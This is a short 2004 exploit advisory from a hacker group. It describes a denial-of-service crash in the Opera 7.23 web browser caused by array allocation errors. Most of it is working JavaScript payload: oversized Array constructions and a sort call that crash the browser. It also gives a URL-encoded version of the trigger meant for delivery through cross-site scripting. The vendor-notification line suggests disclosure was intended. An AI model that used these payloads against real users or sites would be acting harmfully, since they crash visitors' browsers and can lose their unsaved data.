===================================== Opera Array Allocation Managment Exploit ===================================== Dicovered by- d3thStaR [!AM] <d3thStaR at rootthief.com> Greets: !AM Crew, Atomix, d3thstar, mgrd, 0x29A Crew, rootthief.com. Sources: Safari Overflow Exploit- kang Confirmed products effected- Opera 7.23 Linux, Opera 7.23 Windows =======Description of Problem======= Someone could remotely seg-fault the Opera web-browser by creating an array allocation managment error. <script>var a = new Array(99999999999999999999999); a[0+5]="AAAAA";</script> <script>var bam = new Array(0x23000000); bam.sort(new Function("return 1"));</script> Results in crashed client. No, severe, damage; did loose a 'Note' on one test. =======Precautions======= Be aware of cross-site scripting attacks. Known URL triggers: %40%3cscript%3evar%20bam%20%3d%20new%20Array%280x2 3000000%29%3b%20bam%2esort%28new%20Function%28%22r eturn%201%22%29%29%3b%3c%2fscript%3e Vendor- Opera.com Notified- 3/12/04_1:04am/Central d3thStaR <d3thStaR at rootthief.com>